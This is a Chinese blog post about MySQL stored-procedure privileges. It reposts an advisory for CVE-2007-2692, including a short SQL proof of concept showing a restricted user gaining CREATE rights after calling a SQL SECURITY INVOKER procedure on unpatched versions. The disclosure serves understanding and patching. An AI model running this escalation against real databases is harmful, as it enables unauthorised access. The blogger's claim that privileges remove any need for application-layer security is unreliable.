mysql存储过程权限-sss0213-ChinaUnix博客

对你说sunshasha.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

sss0213

博客访问： 2373968
博文数量： 473
博客积分： 12252
博客等级：上将
技术积分： 4307
用户组：普通用户
注册时间： 2007-10-12 10:02

文章分类

全部博文（473）

NoSQL（2）
c（1）
ORACLE（21）

OCI（7）

操作（11）
javascript（47）
php（37）

smarty（1）
存储（16）

USB设备（1）

RAID（1）

分区（4）

硬盘（8）
Shell（36）
心情随笔（2）
嵌入式（4）
其它（7）
C和C++（33）
SQLITE（3）

翻译（0）
网络编程（6）
进程和线程编程（4）
工作日志（2）
MYSQL（143）

memcache（0）

high performance（1）

使用心得（83）

看过的手册（2）
Linux（107）

centos（2）

程序（1）

源码分析（2）

工具（4）

内核（2）

文本编辑（6）

配置（19）

信号（2）

命令（37）
未分配的博文（2）

文章存档

2012年（8）

2011年（63）

2010年（73）

2009年（231）

2008年（98）

我的朋友

相关博文

mysql存储过程权限

分类： Mysql/postgreSQL

2009-08-18 13:12:17

下面摘自：

http://blog.sina.com.cn/s/blog_550ffb0b0100dzox.html

今天给线上一台服务器的添加存储过程，同样的代码在测试机上OK，在线上就Access Denied，show grants for user了一下，看到有create权限，以为对存储过程也适用，又检查了一下代码试验了几次，还是不行，于是google之，在百度知道里看到了如下的介绍，原来存储过程虽然用的相同的create，alter但是权限是单独的，看来mysql手册里的索引查找方式并不是单个的词是有原因的，例如索引里不只是存在show，而是存在show tables、show processlist等关键词。。。。。。。

mysql的存储过程也出来许久了（昨天看到一片今年一月的一片文章说mysql没有存储过程，很郁闷，难道大家的观念已经根深蒂固到如此的程度了？）但是网上的资料却少之又少，更别说书上了。为了让大家少走点弯路—— 下面提到的将是几个在使用存储过程的时候需要的几个小细节。首先，在mysql存储过程出现的同时，用户权限也增加了5种，其中和存储过程有关的权限有三种： ALTER ROUTINE 编辑或删除存储过程 CREATE ROUTINE 建立存储过程 EXECUTE 运行存储过程在使用GRANT创建用户的时候分配这三种权限。存储过程在运行的时候默认是使用建立者的权限运行的。需要注意的是在一个用户拥有建立存储过程的权限时，如果其没有对于select、update或delete等权限的话，虽然操作数据的存储过程可以建立，但调用存储过程的话仍是无法成功的，会返回权限错误，就算拥有运行存储过程的权限也一样。所以，如果有人给你建立了一个没有select、update、delete权限只有CREATE ROUTINE权限的用户，骂他吧，他是故意的。当然这样的用户建立的存储过程倒并不是完全不能使用，创建存储过程中有一个特征子句可以让存储过程使用运行者的权限，在建立存储过程后只要加上SQL SECURITY INVOKER特征子句就可以了。如下。 CREATE PROCEDURE p() SQL SECURITY INVOKER 这样的话就可以分配两批人，一批给与创建存储过程的权限，作为开发者，一批给与运行存储过程和select、update、delete权限，作为测试者。（脑筋秀逗了）

有了这种权限分配，mysql的安全性完全不需要在功能层去保护了，我通过root用户建立的存储过程，但是在功能层用一个只拥有运行存储过程权限的用户来调用。那么，你就算从功能层上得到数据库的用户名和密码，并且模拟了ip，也不能得到你想要的任何东西。有了权限，我们可以放心大胆的使用存储过程，不用担心安全问题了。

下面摘自：

MySQL SQL SECURITY INVOKER存储过程权限提升漏洞

发布日期：2007-05-16

更新日期：2007-05-18

受影响系统：

MySQL AB MySQL 5.1.x < 5.1.18

MySQL AB MySQL 5.0.x < 5.0.40

不受影响系统：

MySQL AB MySQL 5.1.18

MySQL AB MySQL 5.0.40

描述：BUGTRAQ ID: 24011

CVE(CAN) ID: CVE-2007-2692

MySQL是一款使用非常广泛的开放源代码关系数据库系统，拥有各种平台的运行版本。

MySQL在处理SQL SECURITY INVOKER存储过程的返回状态时存在漏洞，本地攻击者可能利用此漏洞提升在数据库系统中的权限。

在从SQL SECURITY INVOKER存储过程返回时MySQL中的mysql_change_db函数没有恢复THD::db_access权限，这可能允许远程已认证用户获得权限提升。仅在用SQL SECURITY INVOKER定义了例程的情况下才会出现这个漏洞，如果使用SQL SECURITY DEFINER定义的话就可以在definer和invoker之间正确地切换安全环境。

<*来源：Alexander Nozdrin

链接：

http://secunia.com/advisories/25301/

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

–

– 以root@mysql身份登录

–

CREATE DATABASE db1;

CREATE DATABASE db2;

GRANT ALL PRIVILEGES ON db1.* TO u1@localhost;

CREATE PROCEDURE db1.p1() SQL SECURITY INVOKER SELECT 1;

–

– 以u1@db2身份登录

–

CREATE TABLE t1(c INT);

Error: CREATE command denied to user %26#39;u1%26#39;@%26#39;localhost%26#39; for table %26#39;t1%26#39;

CALL db1.p1();

CREATE TABLE t1(c INT);

Success!!! (it is a security breach)

–

– 以u1@db2身份登录

–

CREATE TABLE t1(c INT);

Error: CREATE command denied to user %26#39;u1%26#39;@%26#39;localhost%26#39; for table %26#39;t1%26#39;

建议：厂商补丁：

MySQL AB

——–

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://dev.mysql.com/get/Downloads/MySQL-5.0/mysql-5.0.41.tar.gz/from/pick

http://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.18-beta.tar.gz/from/pick

阅读(1424) | 评论(0) | 转发(0) |

上一篇：Mysql:用grant將資料庫中某些表授權給用戶7/8

下一篇：mysql grant创建用户权限

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6